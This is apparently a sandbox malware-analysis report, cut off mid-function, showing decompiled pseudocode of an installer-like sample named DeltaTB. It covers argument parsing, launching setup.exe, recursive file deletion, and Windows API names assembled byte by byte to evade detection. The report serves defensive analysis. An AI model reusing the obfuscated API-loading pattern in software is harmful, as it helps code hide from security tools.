					ExitProcess(_t64);
					goto L18;
				}
				_t65 = 0;
				if( *((intOrPtr*)(_t71 + 0x1ec)) == 0) {
					L11:
					_t69 = E009A14DC(_t71 - 0x78, L"ExecuteFiles");
					_t46 = E009A3CA2(_t45);
					_t83 = _t46;
					if(_t46 == 0) {
						_t61 = L"setup.exe";
						_t48 = E009A121F(_t71 - 0x78, L"setup.exe", __eflags, _t71 + 0x1ec);
					} else {
						_t48 = E009A12E1(_t71 - 0x78, _t71 + 0x1ec, _t65, _t83, _t69); // executed
						_t54 = 0;
					}
					_t64 = _t48;
					if( *(_t71 - 0x7a) == _t54) {
						goto L16;
					} else {
						goto L15;
					}
				}
				_t70 = _t71 + 0x1ec;
				do {
					_t49 = E009A3C6B(_t70, L"/rt", 3);
					_t73 = _t73 + 0xc;
					if(_t49 == 0) {
						L9:
						 *((char*)(_t71 - 0x79)) = 1;
						goto L10;
					}
					_t50 = E009A3C6B(_t70, L"-rt", 3);
					_t73 = _t73 + 0xc;
					if(_t50 == 0) {
						goto L9;
					}
					_t51 = E009A3C6B(_t70, L"/nodel", 6);
					_t73 = _t73 + 0xc;
					if(_t51 == 0) {
						L8:
						 *(_t71 - 0x7a) = _t54;
						goto L10;
					}
					_t52 = E009A3C6B(_t70, L"-nodel", 6);
					_t73 = _t73 + 0xc;
					if(_t52 != 0) {
						goto L10;
					}
					goto L8;
					L10:
					_t65 = _t65 + 1;
					_t70 = _t71 + 0x1ec + _t65 * 2;
				} while ( *((intOrPtr*)(_t71 + 0x1ec + _t65 * 2)) != _t54);
				goto L11;
			}





















                                                                                                                                                              0x009a15a8
                                                                                                                                                              0x009a15af
                                                                                                                                                              0x009a15bc
                                                                                                                                                              0x009a15c4
                                                                                                                                                              0x009a15c7
                                                                                                                                                              0x009a15ca
                                                                                                                                                              0x009a15cd
                                                                                                                                                              0x009a15d1
                                                                                                                                                              0x009a15d7
                                                                                                                                                              0x009a15dd
                                                                                                                                                              0x009a15e3
                                                                                                                                                              0x009a15e9
                                                                                                                                                              0x009a15f6
                                                                                                                                                              0x009a15fe
                                                                                                                                                              0x009a1605
                                                                                                                                                              0x009a1715
                                                                                                                                                              0x009a170f
                                                                                                                                                              0x009a170f
                                                                                                                                                              0x009a170f
                                                                                                                                                              0x009a1619
                                                                                                                                                              0x009a161d
                                                                                                                                                              0x009a16e3
                                                                                                                                                              0x009a16ef
                                                                                                                                                              0x009a16f8
                                                                                                                                                              0x009a16fe
                                                                                                                                                              0x009a1704
                                                                                                                                                              0x009a170c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a170f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a170f
                                                                                                                                                              0x009a1623
                                                                                                                                                              0x009a162c
                                                                                                                                                              0x009a169a
                                                                                                                                                              0x009a16a8
                                                                                                                                                              0x009a16ab
                                                                                                                                                              0x009a16b1
                                                                                                                                                              0x009a16b3
                                                                                                                                                              0x009a16cf
                                                                                                                                                              0x009a16d7
                                                                                                                                                              0x009a16b5
                                                                                                                                                              0x009a16bf
                                                                                                                                                              0x009a16c4
                                                                                                                                                              0x009a16c4
                                                                                                                                                              0x009a16dc
                                                                                                                                                              0x009a16e1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a16e1
                                                                                                                                                              0x009a162e
                                                                                                                                                              0x009a1634
                                                                                                                                                              0x009a163c
                                                                                                                                                              0x009a1641
                                                                                                                                                              0x009a1646
                                                                                                                                                              0x009a1689
                                                                                                                                                              0x009a1689
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1689
                                                                                                                                                              0x009a1650
                                                                                                                                                              0x009a1655
                                                                                                                                                              0x009a165a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1664
                                                                                                                                                              0x009a1669
                                                                                                                                                              0x009a166e
                                                                                                                                                              0x009a1684
                                                                                                                                                              0x009a1684
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1684
                                                                                                                                                              0x009a1678
                                                                                                                                                              0x009a167d
                                                                                                                                                              0x009a1682
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a168d
                                                                                                                                                              0x009a168d
                                                                                                                                                              0x009a168e
                                                                                                                                                              0x009a1695
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 009A1B83: LoadLibraryA.KERNEL32(Kernel32.dll,?,00000000), ref: 009A1B9F
                                                                                                                                                                • Part of subcall function 009A1B83: GetProcAddress.KERNEL32(00000000,?), ref: 009A1BF1
                                                                                                                                                                • Part of subcall function 009A1B83: LoadLibraryA.KERNELBASE(?,?,00000000), ref: 009A1C94
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 009A170F
                                                                                                                                                                • Part of subcall function 009A154E: _wcscpy.LIBCMT ref: 009A1581
                                                                                                                                                                • Part of subcall function 009A154E: _wcscat.LIBCMT ref: 009A158F
                                                                                                                                                                • Part of subcall function 009A154E: _wcscat.LIBCMT ref: 009A1599
                                                                                                                                                              • _wcslen.LIBCMT ref: 009A16AB
                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,00000001,?), ref: 009A16F8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad_wcscat$AddressDirectoryExitProcProcessRemove_wcscpy_wcslen
                                                                                                                                                              • String ID: -nodel$-rt$/nodel$/rt$ExecuteFiles$setup.exe
                                                                                                                                                              • API String ID: 1851553072-3790594100
                                                                                                                                                              • Opcode ID: 0e962699882675b6dad9d2b12f130caa886325048dbc2260b68a637fb2d0ab49
                                                                                                                                                              • Instruction ID: 2234aef7290e0584f7b1b12ad3c9c02ffa15895abeb1ce012510cd0a3f6fe777
                                                                                                                                                              • Opcode Fuzzy Hash: 0e962699882675b6dad9d2b12f130caa886325048dbc2260b68a637fb2d0ab49
                                                                                                                                                              • Instruction Fuzzy Hash: A7419E71A442889ADB30EFA4DC81BDD76ADAFA3304F154029FD05E7182EB705B49CBD5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A1889 Relevance: 13.6, APIs: 9, Instructions: 89fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 112 9a1889-9a18a7 113 9a18a9 112->113 114 9a18ac-9a18c0 GetCurrentDirectoryW 112->114 113->114 115 9a18cd-9a18d6 SetCurrentDirectoryW 114->115 116 9a18c2-9a18c8 GetLastError 114->116 115->116 118 9a18d8 115->118 117 9a1975-9a1982 call 9a3bc5 116->117 120 9a18d9-9a18de 118->120 122 9a1959-9a1968 SetCurrentDirectoryW 120->122 123 9a18e0-9a18f6 120->123 124 9a196a-9a1970 GetLastError 122->124 125 9a1972 122->125 123->122 126 9a18f8-9a18fa 123->126 129 9a1974 124->129 125->129 127 9a18fc-9a1900 126->127 128 9a1907-9a1928 call 9a17dd call 9a3ca2 call 9a17dd 126->128 127->128 130 9a1902-9a1905 127->130 137 9a192a-9a1936 call 9a1889 128->137 138 9a1941-9a194a DeleteFileW 128->138 129->117 130->128 137->129 143 9a1938-9a193f RemoveDirectoryW 137->143 138->120 140 9a194c-9a1955 GetLastError 138->140 140->120 142 9a1957 140->142 142->129 143->120
                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                              			E009A1889(void* __ebx, signed int* __ecx, intOrPtr __edx, WCHAR* _a4, char _a8) {
				signed int _v8;
				short _v532;
				void* __edi;
				void* __esi;
				int _t19;
				intOrPtr _t22;
				int _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				int _t31;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t42;
				WCHAR* _t43;
				intOrPtr* _t45;
				signed int _t46;

				_t42 = __edx;
				_t34 = __ebx;
				_v8 =  *0x9a5000 ^ _t46;
				_t43 = _a4;
				_t45 = __ecx;
				if(_a8 != 0) {
					 *__ecx =  *__ecx & 0x00000000;
				}
				if(GetCurrentDirectoryW(0x104,  &_v532) != 0) {
					_t19 = SetCurrentDirectoryW(_t43); // executed
					if(_t19 == 0) {
						goto L3;
					}
					_push(_t34);
					while(1) {
						_t22 =  *_t45;
						if(_t22 >=  *((intOrPtr*)(_t45 + 4))) {
							break;
						}
						_t39 =  *((intOrPtr*)(_t45 + 8));
						_t42 =  *((intOrPtr*)(_t39 + _t22));
						_t25 = _t22 + 4;
						 *_t45 = _t25;
						_t35 =  *((intOrPtr*)(_t25 + _t39));
						_t26 = _t25 + 4;
						 *_t45 = _t26;
						if(_t35 == 2) {
							break;
						}
						if(_t35 == 0 &&  *((intOrPtr*)(_t45 + 0xc)) > 1) {
							 *_t45 = _t26 + 8;
						}
						 *_t45 =  *_t45 + _t42;
						E009A17DD(_t45);
						_t43 =  *_t45 +  *((intOrPtr*)(_t45 + 8));
						 *_t45 =  *_t45 + E009A3CA2(_t43) + _t28 + 2;
						E009A17DD(_t45);
						if(_t35 != 1) {
							_t31 = DeleteFileW(_t43); // executed
							if(_t31 != 0 || GetLastError() == 2) {
								continue;
							} else {
								goto L20;
							}
						} else {
							_t20 = E009A1889(_t35, _t45, _t42, _t43, 0); // executed
							if(_t20 != 0) {
								L20:
								_pop(_t34);
								goto L21;
							}
							RemoveDirectoryW(_t43); // executed
							continue;
						}
					}
					_t24 = SetCurrentDirectoryW( &_v532); // executed
					if(_t24 != 0) {
						_t20 = 0;
					} else {
						_t20 = GetLastError();
					}
					goto L20;
				} else {
					L3:
					_t20 = GetLastError();
					L21:
					return E009A3BC5(_t20, _t34, _v8 ^ _t46, _t42, _t43, _t45);
				}
			}




















                                                                                                                                                              0x009a1889
                                                                                                                                                              0x009a1889
                                                                                                                                                              0x009a1899
                                                                                                                                                              0x009a18a2
                                                                                                                                                              0x009a18a5
                                                                                                                                                              0x009a18a7
                                                                                                                                                              0x009a18a9
                                                                                                                                                              0x009a18a9
                                                                                                                                                              0x009a18c0
                                                                                                                                                              0x009a18ce
                                                                                                                                                              0x009a18d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a18d8
                                                                                                                                                              0x009a18d9
                                                                                                                                                              0x009a18d9
                                                                                                                                                              0x009a18de
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a18e0
                                                                                                                                                              0x009a18e3
                                                                                                                                                              0x009a18e6
                                                                                                                                                              0x009a18e9
                                                                                                                                                              0x009a18eb
                                                                                                                                                              0x009a18ee
                                                                                                                                                              0x009a18f1
                                                                                                                                                              0x009a18f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a18fa
                                                                                                                                                              0x009a1905
                                                                                                                                                              0x009a1905
                                                                                                                                                              0x009a1907
                                                                                                                                                              0x009a1909
                                                                                                                                                              0x009a1910
                                                                                                                                                              0x009a191d
                                                                                                                                                              0x009a1920
                                                                                                                                                              0x009a1928
                                                                                                                                                              0x009a1942
                                                                                                                                                              0x009a194a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1957
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1957
                                                                                                                                                              0x009a192a
                                                                                                                                                              0x009a192f
                                                                                                                                                              0x009a1936
                                                                                                                                                              0x009a1974
                                                                                                                                                              0x009a1974
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1974
                                                                                                                                                              0x009a1939
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a1939
                                                                                                                                                              0x009a1928
                                                                                                                                                              0x009a1960
                                                                                                                                                              0x009a1968
                                                                                                                                                              0x009a1972
                                                                                                                                                              0x009a196a
                                                                                                                                                              0x009a196a
                                                                                                                                                              0x009a196a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a18c2
                                                                                                                                                              0x009a18c2
                                                                                                                                                              0x009a18c2
                                                                                                                                                              0x009a1975
                                                                                                                                                              0x009a1982
                                                                                                                                                              0x009a1982

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,?), ref: 009A18B8
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A18C2
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 009A18CE
                                                                                                                                                              • _wcslen.LIBCMT ref: 009A1914
                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00000000), ref: 009A1939
                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00000000), ref: 009A1942
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A194C
                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00000000), ref: 009A1960
                                                                                                                                                              • GetLastError.KERNEL32 ref: 009A196A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Directory$CurrentErrorLast$DeleteFileRemove_wcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2019885757-0
                                                                                                                                                              • Opcode ID: b0eefbe41aaa845283a9901e49bca71c2debc5799c7279e4f9346e725fed4dc3
                                                                                                                                                              • Instruction ID: d2edb2b241b1bbc77b342043e9b3d89c3e959a371e589443b679a9d9b49c67b1
                                                                                                                                                              • Opcode Fuzzy Hash: b0eefbe41aaa845283a9901e49bca71c2debc5799c7279e4f9346e725fed4dc3
                                                                                                                                                              • Instruction Fuzzy Hash: 4E31AC306002159BD734EF2AE888B6AB3EDEF97310F20482DE582D2150E778A840EBD0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A1B83 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 413libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 165 9a1b83-9a1bab LoadLibraryA 166 9a1bb1-9a1f4d GetProcAddress LoadLibraryA * 2 165->166 167 9a2207-9a2219 call 9a3bc5 165->167 178 9a1f51-9a2204 166->178 178->167
                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                              			E009A1B83(intOrPtr* __esi) {
				void* __ebx;
				void* __edi;
				_Unknown_base(*)()* _t356;
				struct HINSTANCE__* _t358;
				void* _t361;
				struct HINSTANCE__* _t372;
				void* _t392;
				void* _t400;
				struct HINSTANCE__* _t402;
				void* _t403;
				intOrPtr* _t404;
				signed int _t405;
				void* _t407;

				_t404 = __esi;
				_t405 = _t407 - 0x78;
				 *(_t405 + 0x74) =  *0x9a5000 ^ _t405;
				_t402 = LoadLibraryA("Kernel32.dll");
				if(_t402 != 0) {
					 *(_t405 - 0x24) = 0x47;
					 *((char*)(_t405 - 0x23)) = 0x65;
					 *((char*)(_t405 - 0x22)) = 0x74;
					 *((char*)(_t405 - 0x21)) = 0x50;
					 *((char*)(_t405 - 0x20)) = 0x72;
					 *((char*)(_t405 - 0x1f)) = 0x6f;
					 *((char*)(_t405 - 0x1e)) = 0x63;
					 *((char*)(_t405 - 0x1d)) = 0x41;
					 *((char*)(_t405 - 0x1c)) = 0x64;
					 *((char*)(_t405 - 0x1b)) = 0x64;
					 *((char*)(_t405 - 0x1a)) = 0x72;
					 *((char*)(_t405 - 0x19)) = 0x65;
					 *((char*)(_t405 - 0x18)) = 0x73;
					 *((char*)(_t405 - 0x17)) = 0x73;
					 *((char*)(_t405 - 0x16)) = 0;
					_t356 = GetProcAddress(_t402, _t405 - 0x24);
					 *(__esi + 4) = _t356;
					 *((char*)(_t405 + 0xc)) = 0x4c;
					 *((char*)(_t405 + 0xd)) = 0x6f;
					 *((char*)(_t405 + 0xe)) = 0x61;
					 *((char*)(_t405 + 0xf)) = 0x64;
					 *((char*)(_t405 + 0x10)) = 0x4c;
					 *((char*)(_t405 + 0x11)) = 0x69;
					 *((char*)(_t405 + 0x12)) = 0x62;
					 *((char*)(_t405 + 0x13)) = 0x72;
					 *((char*)(_t405 + 0x14)) = 0x61;
					 *((char*)(_t405 + 0x15)) = 0x72;
					 *((char*)(_t405 + 0x16)) = 0x79;
					 *((char*)(_t405 + 0x17)) = 0x41;
					 *((char*)(_t405 + 0x18)) = 0;
					 *__esi =  *_t356(_t402, _t405 + 0xc);
					 *(_t405 + 0x68) = 0x4f;
					 *((char*)(_t405 + 0x69)) = 0x4c;
					 *((char*)(_t405 + 0x6a)) = 0x45;
					 *((char*)(_t405 + 0x6b)) = 0x33;
					 *((char*)(_t405 + 0x6c)) = 0x32;
					 *((char*)(_t405 + 0x6d)) = 0x2e;
					 *((char*)(_t405 + 0x6e)) = 0x44;
					 *((char*)(_t405 + 0x6f)) = 0x4c;
					 *((char*)(_t405 + 0x70)) = 0x4c;
					 *((char*)(_t405 + 0x71)) = 0;
					 *((char*)(_t405 - 4)) = 0x43;
					 *((char*)(_t405 - 3)) = 0x6f;
					 *((char*)(_t405 - 2)) = 0x43;
					 *((char*)(_t405 - 1)) = 0x72;
					 *_t405 = 0x65;
					 *((char*)(_t405 + 1)) = 0x61;
					 *((char*)(_t405 + 2)) = 0x74;
					 *((char*)(_t405 + 3)) = 0x65;
					 *((char*)(_t405 + 4)) = 0x47;
					 *((char*)(_t405 + 5)) = 0x75;
					 *((char*)(_t405 + 6)) = 0x69;
					 *((char*)(_t405 + 7)) = 0x64;
					 *((char*)(_t405 + 8)) = 0;
					_t358 = LoadLibraryA(_t405 + 0x68); // executed
					_push(_t405 - 4);
					_push(_t358);
					 *((intOrPtr*)(__esi + 8)) =  *(__esi + 4)();
					 *((char*)(_t405 + 0x50)) = 0x55;
					 *((char*)(_t405 + 0x51)) = 0x73;
					 *((char*)(_t405 + 0x52)) = 0x65;
					 *((char*)(_t405 + 0x53)) = 0x72;
					 *((char*)(_t405 + 0x54)) = 0x33;
					 *((char*)(_t405 + 0x55)) = 0x32;
					 *((char*)(_t405 + 0x56)) = 0x2e;
					 *((char*)(_t405 + 0x57)) = 0x64;
					 *((char*)(_t405 + 0x58)) = 0x6c;
					 *((char*)(_t405 + 0x59)) = 0x6c;
					 *((char*)(_t405 + 0x5a)) = 0;
					 *((char*)(_t405 + 0x38)) = 0x4d;
					_push(_t405 + 0x50);
					 *((char*)(_t405 + 0x39)) = 0x65;
					 *((char*)(_t405 + 0x3a)) = 0x73;
					 *((char*)(_t405 + 0x3b)) = 0x73;
					 *((char*)(_t405 + 0x3c)) = 0x61;
					 *((char*)(_t405 + 0x3d)) = 0x67;
					 *((char*)(_t405 + 0x3e)) = 0x65;
					 *((char*)(_t405 + 0x3f)) = 0x42;
					 *((char*)(_t405 + 0x40)) = 0x6f;
					 *((char*)(_t405 + 0x41)) = 0x78;
					 *((char*)(_t405 + 0x42)) = 0x57;
					 *((char*)(_t405 + 0x43)) = 0;
					_t361 =  *__esi();
					_push(_t405 + 0x38);
					_push(_t361);
					 *((intOrPtr*)(__esi + 0xc)) =  *(__esi + 4)();
					_push(_t405 - 0x90);
					_push(_t402);
					 *((char*)(_t405 - 0x90)) = 0x43;
					 *((char*)(_t405 - 0x8f)) = 0x72;
					 *((char*)(_t405 - 0x8e)) = 0x65;
					 *((char*)(_t405 - 0x8d)) = 0x61;
					 *((char*)(_t405 - 0x8c)) = 0x74;
					 *((char*)(_t405 - 0x8b)) = 0x65;
					 *((char*)(_t405 - 0x8a)) = 0x44;
					 *((char*)(_t405 - 0x89)) = 0x69;
					 *((char*)(_t405 - 0x88)) = 0x72;
					 *((char*)(_t405 - 0x87)) = 0x65;
					 *((char*)(_t405 - 0x86)) = 0x63;
					 *((char*)(_t405 - 0x85)) = 0x74;
					 *((char*)(_t405 - 0x84)) = 0x6f;
					 *((char*)(_t405 - 0x83)) = 0x72;
					 *((char*)(_t405 - 0x82)) = 0x79;
					 *((char*)(_t405 - 0x81)) = 0x57;
					 *((char*)(_t405 - 0x80)) = 0;
					 *((intOrPtr*)(__esi + 0x10)) =  *(__esi + 4)();
					_push(_t405 - 0x14);
					_push(_t402);
					 *((char*)(_t405 - 0x14)) = 0x47;
					 *((char*)(_t405 - 0x13)) = 0x65;
					 *((char*)(_t405 - 0x12)) = 0x74;
					 *((char*)(_t405 - 0x11)) = 0x54;
					 *((char*)(_t405 - 0x10)) = 0x65;
					 *((char*)(_t405 - 0xf)) = 0x6d;
					 *((char*)(_t405 - 0xe)) = 0x70;
					 *((char*)(_t405 - 0xd)) = 0x50;
					 *((char*)(_t405 - 0xc)) = 0x61;
					 *((char*)(_t405 - 0xb)) = 0x74;
					 *((char*)(_t405 - 0xa)) = 0x68;
					 *((char*)(_t405 - 9)) = 0x57;
					 *((char*)(_t405 - 8)) = 0;
					 *((intOrPtr*)(__esi + 0x14)) =  *(__esi + 4)();
					 *((char*)(_t405 - 0xd4)) = 0x47;
					 *((char*)(_t405 - 0xd3)) = 0x65;
					 *((char*)(_t405 - 0xd2)) = 0x74;
					 *((char*)(_t405 - 0xd1)) = 0x53;
					 *((char*)(_t405 - 0xd0)) = 0x79;
					 *((char*)(_t405 - 0xcf)) = 0x73;
					 *((char*)(_t405 - 0xce)) = 0x74;
					 *((char*)(_t405 - 0xcd)) = 0x65;
					 *((char*)(_t405 - 0xcc)) = 0x6d;
					 *((char*)(_t405 - 0xcb)) = 0x57;
					 *((char*)(_t405 - 0xca)) = 0x6f;
					 *((char*)(_t405 - 0xc9)) = 0x77;
					 *((char*)(_t405 - 0xc8)) = 0x36;
					 *((char*)(_t405 - 0xc7)) = 0x34;
					 *((char*)(_t405 - 0xc6)) = 0x44;
					 *((char*)(_t405 - 0xc5)) = 0x69;
					 *((char*)(_t405 - 0xc4)) = 0x72;
					 *((char*)(_t405 - 0xc3)) = 0x65;
					 *((char*)(_t405 - 0xc2)) = 0x63;
					 *((char*)(_t405 - 0xc1)) = 0x74;
					 *((char*)(_t405 - 0xc0)) = 0x6f;
					 *((char*)(_t405 - 0xbf)) = 0x72;
					_push(_t405 - 0xd4);
					_push(_t402);
					 *((char*)(_t405 - 0xbe)) = 0x79;
					 *((char*)(_t405 - 0xbd)) = 0x57;
					 *((char*)(_t405 - 0xbc)) = 0;
					 *((intOrPtr*)(__esi + 0x18)) =  *(__esi + 4)();
					_push(_t405 - 0x54);
					_push(_t402);
					 *((char*)(_t405 - 0x54)) = 0x47;
					 *((char*)(_t405 - 0x53)) = 0x65;
					 *((char*)(_t405 - 0x52)) = 0x74;
					 *((char*)(_t405 - 0x51)) = 0x53;
					 *((char*)(_t405 - 0x50)) = 0x74;
					 *((char*)(_t405 - 0x4f)) = 0x61;
					 *((char*)(_t405 - 0x4e)) = 0x72;
					 *((char*)(_t405 - 0x4d)) = 0x74;
					 *((char*)(_t405 - 0x4c)) = 0x75;
					 *((char*)(_t405 - 0x4b)) = 0x70;
					 *((char*)(_t405 - 0x4a)) = 0x49;
					 *((char*)(_t405 - 0x49)) = 0x6e;
					 *((char*)(_t405 - 0x48)) = 0x66;
					 *((char*)(_t405 - 0x47)) = 0x6f;
					 *((char*)(_t405 - 0x46)) = 0x57;
					 *((char*)(_t405 - 0x45)) = 0;
					 *((intOrPtr*)(__esi + 0x1c)) =  *(__esi + 4)();
					 *(_t405 + 0x44) = 0x53;
					 *((char*)(_t405 + 0x45)) = 0x68;
					 *((char*)(_t405 + 0x46)) = 0x65;
					 *((char*)(_t405 + 0x47)) = 0x6c;
					 *((char*)(_t405 + 0x48)) = 0x6c;
					 *((char*)(_t405 + 0x49)) = 0x33;
					 *((char*)(_t405 + 0x4a)) = 0x32;
					 *((char*)(_t405 + 0x4b)) = 0x2e;
					 *((char*)(_t405 + 0x4c)) = 0x64;
					 *((char*)(_t405 + 0x4d)) = 0x6c;
					 *((char*)(_t405 + 0x4e)) = 0x6c;
					 *((char*)(_t405 + 0x4f)) = 0;
					 *((char*)(_t405 - 0x7c)) = 0x53;
					 *((char*)(_t405 - 0x7b)) = 0x48;
					 *((char*)(_t405 - 0x7a)) = 0x47;
					 *((char*)(_t405 - 0x79)) = 0x65;
					 *((char*)(_t405 - 0x78)) = 0x74;
					 *((char*)(_t405 - 0x77)) = 0x46;
					 *((char*)(_t405 - 0x76)) = 0x6f;
					 *((char*)(_t405 - 0x75)) = 0x6c;
					 *((char*)(_t405 - 0x74)) = 0x64;
					 *((char*)(_t405 - 0x73)) = 0x65;
					 *((char*)(_t405 - 0x72)) = 0x72;
					 *((char*)(_t405 - 0x71)) = 0x50;
					 *((char*)(_t405 - 0x70)) = 0x61;
					 *((char*)(_t405 - 0x6f)) = 0x74;
					 *((char*)(_t405 - 0x6e)) = 0x68;
					 *((char*)(_t405 - 0x6d)) = 0x57;
					 *((char*)(_t405 - 0x6c)) = 0;
					_t372 = LoadLibraryA(_t405 + 0x44); // executed
					_push(_t405 - 0x7c);
					_push(_t372);
					 *((intOrPtr*)(__esi + 0x20)) =  *(__esi + 4)();
					 *((char*)(_t405 - 0xb8)) = 0x57;
					 *((char*)(_t405 - 0xb7)) = 0x61;
					 *((char*)(_t405 - 0xb6)) = 0x69;
					 *((char*)(_t405 - 0xb5)) = 0x74;
					 *((char*)(_t405 - 0xb4)) = 0x46;
					 *((char*)(_t405 - 0xb3)) = 0x6f;
					 *((char*)(_t405 - 0xb2)) = 0x72;
					 *((char*)(_t405 - 0xb1)) = 0x53;
					 *((char*)(_t405 - 0xb0)) = 0x69;
					 *((char*)(_t405 - 0xaf)) = 0x6e;
					 *((char*)(_t405 - 0xae)) = 0x67;
					 *((char*)(_t405 - 0xad)) = 0x6c;
					 *((char*)(_t405 - 0xac)) = 0x65;
					 *((char*)(_t405 - 0xab)) = 0x4f;
					 *((char*)(_t405 - 0xaa)) = 0x62;
					_push(_t405 - 0xb8);
					_push(_t402);
					 *((char*)(_t405 - 0xa9)) = 0x6a;
					 *((char*)(_t405 - 0xa8)) = 0x65;
					 *((char*)(_t405 - 0xa7)) = 0x63;
					 *((char*)(_t405 - 0xa6)) = 0x74;
					 *((char*)(_t405 - 0xa5)) = 0;
					 *((intOrPtr*)(__esi + 0x24)) =  *(__esi + 4)();
					_push(_t405 - 0xa4);
					_push(_t402);
					 *((char*)(_t405 - 0xa4)) = 0x47;
					 *((char*)(_t405 - 0xa3)) = 0x65;
					 *((char*)(_t405 - 0xa2)) = 0x74;
					 *((char*)(_t405 - 0xa1)) = 0x45;
					 *((char*)(_t405 - 0xa0)) = 0x78;
					 *((char*)(_t405 - 0x9f)) = 0x69;
					 *((char*)(_t405 - 0x9e)) = 0x74;
					 *((char*)(_t405 - 0x9d)) = 0x43;
					 *((char*)(_t405 - 0x9c)) = 0x6f;
					 *((char*)(_t405 - 0x9b)) = 0x64;
					 *((char*)(_t405 - 0x9a)) = 0x65;
					 *((char*)(_t405 - 0x99)) = 0x50;
					 *((char*)(_t405 - 0x98)) = 0x72;
					 *((char*)(_t405 - 0x97)) = 0x6f;
					 *((char*)(_t405 - 0x96)) = 0x63;
					 *((char*)(_t405 - 0x95)) = 0x65;
					 *((char*)(_t405 - 0x94)) = 0x73;
					 *((char*)(_t405 - 0x93)) = 0x73;
					 *((char*)(_t405 - 0x92)) = 0;
					 *((intOrPtr*)(__esi + 0x28)) =  *(__esi + 4)();
					_push(_t405 + 0x2c);
					_push(_t402);
					 *((char*)(_t405 + 0x2c)) = 0x43;
					 *((char*)(_t405 + 0x2d)) = 0x6c;
					 *((char*)(_t405 + 0x2e)) = 0x6f;
					 *((char*)(_t405 + 0x2f)) = 0x73;
					 *((char*)(_t405 + 0x30)) = 0x65;
					 *((char*)(_t405 + 0x31)) = 0x48;
					 *((char*)(_t405 + 0x32)) = 0x61;
					 *((char*)(_t405 + 0x33)) = 0x6e;
					 *((char*)(_t405 + 0x34)) = 0x64;
					 *((char*)(_t405 + 0x35)) = 0x6c;
					 *((char*)(_t405 + 0x36)) = 0x65;
					 *((char*)(_t405 + 0x37)) = 0;
					 *((intOrPtr*)(__esi + 0x2c)) =  *(__esi + 4)();
					_push(_t405 - 0x34);
					_push(_t402);
					 *((char*)(_t405 - 0x34)) = 0x46;
					 *((char*)(_t405 - 0x33)) = 0x69;
					 *((char*)(_t405 - 0x32)) = 0x6e;
					 *((char*)(_t405 - 0x31)) = 0x64;
